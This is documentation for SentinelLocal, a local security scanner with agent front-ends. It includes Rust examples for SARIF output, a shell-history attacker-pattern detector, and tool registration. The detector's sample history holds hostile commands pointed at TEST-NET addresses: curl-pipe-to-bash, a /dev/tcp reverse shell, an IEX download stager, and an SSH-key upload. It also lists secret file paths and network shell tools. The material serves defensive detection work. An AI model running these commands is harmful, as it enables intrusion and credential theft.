# Tools & scanners

SentinelLocal ships 13 deterministic scanners and three agent front-ends. Every finding carries a `Severity` and a human-readable summary, and the same findings can be emitted as pretty-printed CLI output, JSON, or SARIF v2.1.0, so they load into any SARIF viewer or CI annotation step.
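As an added example (not SentinelLocal's own code), the shape of a finding and how its `Severity` collapses onto the four SARIF v2.1.0 `result.level` values. The five `Severity` variants, the `Finding` fields, the driver name and the sample findings are assumptions; only `std` is used, so the JSON is built by hand.

```rust
// Added example, not SentinelLocal's own code: a Finding carrying a Severity
// and summary, serialised to a minimal SARIF v2.1.0 log with std only.
// The Severity variants and the SARIF level mapping are assumptions.

#[derive(Clone, Copy, Debug, PartialEq)]
pub enum Severity {
    Info,
    Low,
    Medium,
    High,
    Critical,
}

impl Severity {
    /// SARIF 2.1.0 `result.level` allows only "none", "note", "warning", "error";
    /// collapse the five-step scale onto it.
    pub fn sarif_level(self) -> &'static str {
        match self {
            Severity::Info => "note",
            Severity::Low | Severity::Medium => "warning",
            Severity::High | Severity::Critical => "error",
        }
    }
}

pub struct Finding {
    pub tool: &'static str, // scanner that produced it; doubles as SARIF ruleId
    pub severity: Severity,
    pub summary: String,
    pub path: Option<String>, // artifact the finding points at, if any
}

/// Escape a string for embedding inside JSON double quotes.
fn json_escape(s: &str) -> String {
    let mut out = String::with_capacity(s.len());
    for c in s.chars() {
        match c {
            '"' => out.push_str("\\\""),
            '\\' => out.push_str("\\\\"),
            '\n' => out.push_str("\\n"),
            '\r' => out.push_str("\\r"),
            '\t' => out.push_str("\\t"),
            c if (c as u32) < 0x20 => out.push_str(&format!("\\u{:04x}", c as u32)),
            c => out.push(c),
        }
    }
    out
}

/// Build one SARIF `result` object; the location block is only emitted when
/// the finding actually points at a file.
fn sarif_result(f: &Finding) -> String {
    let mut r = format!(
        "{{\"ruleId\":\"{}\",\"level\":\"{}\",\"message\":{{\"text\":\"{}\"}}",
        json_escape(f.tool),
        f.severity.sarif_level(),
        json_escape(&f.summary)
    );
    if let Some(p) = &f.path {
        r.push_str(&format!(
            ",\"locations\":[{{\"physicalLocation\":{{\"artifactLocation\":{{\"uri\":\"{}\"}}}}}}]",
            json_escape(p)
        ));
    }
    r.push('}');
    r
}

/// Wrap results in the SARIF envelope: one run, one tool driver.
pub fn to_sarif(findings: &[Finding]) -> String {
    let results: Vec<String> = findings.iter().map(sarif_result).collect();
    format!(
        "{{\"version\":\"2.1.0\",\"runs\":[{{\"tool\":{{\"driver\":{{\"name\":\"SentinelLocal\"}}}},\"results\":[{}]}}]}}",
        results.join(",")
    )
}

/// Constructed sample findings (TEST-NET address), not real scanner output.
pub fn sample_findings() -> Vec<Finding> {
    vec![
        Finding {
            tool: "audit_hosts_file",
            severity: Severity::High,
            summary: "update.example.com resolves to 203.0.113.9 via /etc/hosts".into(),
            path: Some("/etc/hosts".into()),
        },
        Finding {
            tool: "recent_files",
            severity: Severity::Info,
            summary: "3 files modified in /tmp in the last 2h".into(),
            path: None,
        },
    ]
}

fn main() {
    println!("{}", to_sarif(&sample_findings()));
}
```

The mapping is deliberately lossy: SARIF consumers key on `level`, so the original `Severity` should also be carried in `properties` if the five-step scale matters downstream.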
## Deterministic scanners

| Tool | Description |
|---|---|
| `scan_file` | Static analysis of executables and scripts using goblin (PE / ELF / Mach-O): hashing, suspicious-import detection, URL and IP extraction. |
| `yara_scan` | Pure-Rust YARA matching via yara-x; ships a starter ruleset. |
| `scan_processes` | Cross-platform process snapshot (sysinfo) with stalkerware / RAT name matching. |
| `scan_network` | TCP / UDP socket enumeration (netstat2) with PID attribution and outbound-connection flagging. |
| `audit_persistence` | Autostart auditor: systemd, cron, launchd, Windows Run keys. |
| `audit_scheduled` | Time-based job auditor: Windows Scheduled Tasks, systemd timers, cron, launchd. |
| `audit_hosts_file` | DNS-hijack detector for `/etc/hosts` and the Windows hosts file. |
| `scan_browser_extensions` | Chrome / Edge / Brave / Firefox extension auditor; flags broad host and web-request permissions. |
| `recent_files` | Surfaces files modified in the last N hours under temp, Downloads and the current working directory. |
| `ioc_lookup` | Hashes files and matches them against a local IOC list (drop in a MalwareBazaar / abuse.ch export or your SOC's own feed). |
| `audit_logs` | Reads recent OS log entries via `journalctl` (Linux), `Get-WinEvent` (Windows) or `log show` (macOS); flags known-bad event IDs, error/fault levels, and ssh/sudo failures. |
| `audit_shell_history` | Scans bash / zsh / fish / PowerShell PSReadLine history for attacker patterns: curl-pipe-to-shell, IEX stagers, base64 decode-and-exec, reverse shells, credential exfiltration. |
| `monitor_snapshot` | Re-snapshots processes and sockets at a fixed interval and reports the delta, catching short-lived droppers and beaconing connections that a single snapshot would miss. |

The name- and hash-based scanners (`scan_processes`, `ioc_lookup`) are only as good as their lists: a renamed binary or a recompiled sample will not match, so treat them as a fast first pass and rely on the behavioural scanners (`scan_network`, `audit_persistence`, `monitor_snapshot`) for anything the lists miss.
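As an added example of the kind of detection `audit_shell_history` describes (this is not the project's own matcher, and its heuristics are assumptions): a `std`-only classifier for the five listed patterns, run over constructed history lines in bash, zsh extended-history, fish and PSReadLine formats. The format handling matters as much as the patterns, since zsh and fish wrap each command in framing that would otherwise defeat a naive prefix match.

```rust
// Added example, not SentinelLocal's audit_shell_history: a std-only heuristic
// classifier for the attacker patterns listed above, run over constructed
// history lines in bash, zsh (extended history), fish and PSReadLine formats.

#[derive(Clone, Copy, Debug, PartialEq)]
pub enum Pattern {
    CurlPipeToShell,
    IexStager,
    Base64DecodeExec,
    ReverseShell,
    CredentialExfil,
}

#[derive(Debug)]
pub struct Hit {
    pub line: String,
    pub patterns: Vec<Pattern>,
}

/// Strip per-shell framing so only the command remains, lower-cased:
/// zsh extended history `: <epoch>:<dur>;cmd`, fish `- cmd: cmd`;
/// bash and PSReadLine are already one command per line.
fn normalize(raw: &str) -> String {
    let t = raw.trim();
    let cmd = if let Some(rest) = t.strip_prefix("- cmd: ") {
        rest
    } else if t.starts_with(": ") {
        t.splitn(2, ';').nth(1).unwrap_or(t)
    } else {
        t
    };
    cmd.to_ascii_lowercase()
}

/// Whole-token match; avoids `iex` matching inside `iexplore`.
fn has_word(cmd: &str, word: &str) -> bool {
    cmd.split(|c: char| !(c.is_ascii_alphanumeric() || matches!(c, '-' | '.' | '_' | '/')))
        .any(|t| t == word)
}

/// True if any pipeline stage after the first starts an interpreter.
fn pipes_into_shell(cmd: &str) -> bool {
    cmd.split('|').skip(1).any(|stage| {
        let mut toks = stage.split_whitespace();
        let mut first = toks.next().unwrap_or("");
        if first == "sudo" {
            first = toks.next().unwrap_or("");
        }
        let name = first.rsplit('/').next().unwrap_or(first);
        matches!(name, "sh" | "bash" | "zsh" | "dash" | "ksh" | "python" | "python3" | "perl")
    })
}

pub fn classify(raw: &str) -> Vec<Pattern> {
    let cmd = normalize(raw);
    let fetches = cmd.contains("curl ") || cmd.contains("wget ");
    let nc = has_word(&cmd, "nc") || has_word(&cmd, "ncat") || has_word(&cmd, "netcat");
    let mut hits = Vec::new();

    if fetches && pipes_into_shell(&cmd) {
        hits.push(Pattern::CurlPipeToShell);
    }
    if (has_word(&cmd, "iex") || cmd.contains("invoke-expression"))
        && ["downloadstring", "net.webclient", "invoke-webrequest", "iwr ", "irm "]
            .iter()
            .any(|s| cmd.contains(*s))
    {
        hits.push(Pattern::IexStager);
    }
    let b64_unix = has_word(&cmd, "base64")
        && (cmd.contains(" -d") || cmd.contains("--decode"))
        && pipes_into_shell(&cmd);
    let b64_ps = cmd.contains("powershell") && cmd.contains("-enc"); // -enc / -encodedcommand
    if b64_unix || b64_ps {
        hits.push(Pattern::Base64DecodeExec);
    }
    if cmd.contains("/dev/tcp/")
        || (nc && (cmd.contains(" -e ") || cmd.contains(" -c ")))
        || (cmd.contains("socat") && cmd.contains("exec:"))
    {
        hits.push(Pattern::ReverseShell);
    }
    // Exfil = a secret-bearing path plus something that can send it off-host.
    let secrets = ["/etc/shadow", "id_rsa", "id_ed25519", ".aws/credentials", ".git-credentials", "ntds.dit"];
    let sends = fetches || nc || has_word(&cmd, "scp") || cmd.contains("/dev/tcp/");
    if sends && secrets.iter().any(|s| cmd.contains(*s)) {
        hits.push(Pattern::CredentialExfil);
    }
    hits
}

/// Scan a whole history file; lines with no pattern are dropped.
pub fn scan_history(text: &str) -> Vec<Hit> {
    text.lines()
        .filter_map(|l| {
            let patterns = classify(l);
            (!patterns.is_empty()).then(|| Hit { line: l.to_string(), patterns })
        })
        .collect()
}

/// Constructed sample (TEST-NET addresses); not real captured history.
pub const SAMPLE_HISTORY: &str = r#"curl -fsSL http://203.0.113.9/x.sh | bash
: 1700000000:0;echo aGk= | base64 -d | sh
- cmd: bash -i >& /dev/tcp/198.51.100.7/4444 0>&1
IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')
tar czf - ~/.ssh/id_rsa | curl -T - http://203.0.113.9/up
git status
curl -I https://example.com"#;

fn main() {
    for h in scan_history(SAMPLE_HISTORY) {
        println!("{:?}  <-  {}", h.patterns, h.line);
    }
}
```

Two caveats a practitioner should keep in mind: history files are written by the shell on exit and are trivially cleared (`history -c`, `unset HISTFILE`), so an empty or truncated file is itself worth a finding; and plain `curl -I` or `cat /etc/shadow` on their own are not flagged here, which is deliberate, because the signal is in the combination (fetch plus pipe, secret plus sender), not in any single command.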
## Agent front-ends

| Command | Description |
|---|---|
| `agent` | One-shot ReAct loop: the model plans, then calls the tools above in response to a natural-language goal. |
| `chat` | Interactive terminal REPL: a persistent planning conversation with live plan / reasoning / tool / finding output. |
| `serve` | Local HTTP chat UI for testing the agent interactively in a browser. |
## Listing tools at runtime

`sentinel tools` lists every registered tool with its description. Because tool descriptors are converted to OpenAI-style function definitions on the fly, anything that is registered is automatically available to the agent; see Contributing for how to add your own.
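As an added illustration of that conversion (not SentinelLocal's registry code): a hypothetical `ToolDescriptor` and the `std`-only rendering of a registry into the OpenAI-style `tools` array sent with each chat-completion request. The descriptor shape, the `recent_files` parameters and the two registry entries are assumptions; the output format (`{"type":"function","function":{name, description, parameters}}` with a JSON Schema object under `parameters`) is the OpenAI function-calling layout.

```rust
// Added example, not SentinelLocal's registry: a hypothetical ToolDescriptor and
// its on-the-fly conversion to an OpenAI-style "tools" array entry, std only.
// The descriptor shape and the recent_files parameters are assumptions.

pub struct Param {
    pub name: &'static str,
    pub ty: &'static str, // JSON Schema type: "string", "integer", "boolean", ...
    pub desc: &'static str,
    pub required: bool,
}

pub struct ToolDescriptor {
    pub name: &'static str,
    pub description: &'static str,
    pub params: &'static [Param],
}

/// Escape a string for embedding inside JSON double quotes.
fn json_escape(s: &str) -> String {
    let mut out = String::with_capacity(s.len());
    for c in s.chars() {
        match c {
            '"' => out.push_str("\\\""),
            '\\' => out.push_str("\\\\"),
            '\n' => out.push_str("\\n"),
            c if (c as u32) < 0x20 => out.push_str(&format!("\\u{:04x}", c as u32)),
            c => out.push(c),
        }
    }
    out
}

/// One descriptor -> {"type":"function","function":{"name","description","parameters"}}.
/// `parameters` is a JSON Schema object; non-required params are simply left
/// out of the `required` array.
pub fn to_openai_function(t: &ToolDescriptor) -> String {
    let props: Vec<String> = t
        .params
        .iter()
        .map(|p| {
            format!(
                "\"{}\":{{\"type\":\"{}\",\"description\":\"{}\"}}",
                json_escape(p.name),
                json_escape(p.ty),
                json_escape(p.desc)
            )
        })
        .collect();
    let required: Vec<String> = t
        .params
        .iter()
        .filter(|p| p.required)
        .map(|p| format!("\"{}\"", json_escape(p.name)))
        .collect();
    format!(
        "{{\"type\":\"function\",\"function\":{{\"name\":\"{}\",\"description\":\"{}\",\"parameters\":{{\"type\":\"object\",\"properties\":{{{}}},\"required\":[{}]}}}}}}",
        json_escape(t.name),
        json_escape(t.description),
        props.join(","),
        required.join(",")
    )
}

/// The whole registry -> the `tools` array; every registered descriptor is
/// exposed to the model, which is what makes "register it and it's available" work.
pub fn to_openai_tools(registry: &[ToolDescriptor]) -> String {
    let entries: Vec<String> = registry.iter().map(to_openai_function).collect();
    format!("[{}]", entries.join(","))
}

/// Hypothetical registry with two of the scanners from the table above.
pub static REGISTRY: &[ToolDescriptor] = &[
    ToolDescriptor {
        name: "recent_files",
        description: "Surfaces files modified in the last N hours under temp / Downloads / cwd.",
        params: &[
            Param { name: "hours", ty: "integer", desc: "Look-back window in hours", required: true },
            Param { name: "root", ty: "string", desc: "Directory to scan; defaults to cwd", required: false },
        ],
    },
    ToolDescriptor {
        name: "audit_hosts_file",
        description: "DNS-hijack detector for /etc/hosts and the Windows hosts file.",
        params: &[],
    },
];

fn main() {
    println!("{}", to_openai_tools(REGISTRY));
}
```

Because the model sees the whole registry, the description strings are part of the agent's attack surface: a descriptor is prompt text, so keep descriptions factual and avoid wording that could be read as an instruction.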